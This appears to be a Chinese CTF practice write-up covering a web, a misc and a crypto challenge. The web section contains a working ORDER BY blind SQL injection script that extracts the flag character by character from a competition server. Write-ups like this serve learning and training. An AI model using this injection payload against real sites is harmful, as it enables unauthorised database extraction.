Fork me on GitHub

周周练

WEB

  • 简单order注入

    • 提示是order注入,网上查了资料,学习了一波,源码里提示: select flag from flag,省去爆表名列名了,直接爆数据
    • 盲注脚本:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import requests
    flag = ''
    url = 'http://101.71.29.5:10001/?order=(select+1+regexp+if(ord(substring((select+flag+from+flag+limit+0,1),{},1))={},1,0x00))%23&button=submit'
    for i in range(24,28):
    for j in range(32,127):
    u = url.format(i,j)
    #print(u)
    if ('fangzhang' not in requests.get(u).text):
    flag += chr(j)
    print(flag)
    break
    print(flag)
  • 签到题不会,呜呜呜

MISC

  • 下载RouterPassView打开bin文件就能看到flag

    1.png

CRYPTO

  • Description: 密码学历史中,有两位知名的杰出人物,Alice和Bob。他们的爱情经过置换和轮加密也难以混淆,即使是没有身份认证也可以知根知底。就像在数学王国中的素数一样,孤傲又热情。下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。
  • 分解大数网站: http://www.factordb.com/index.php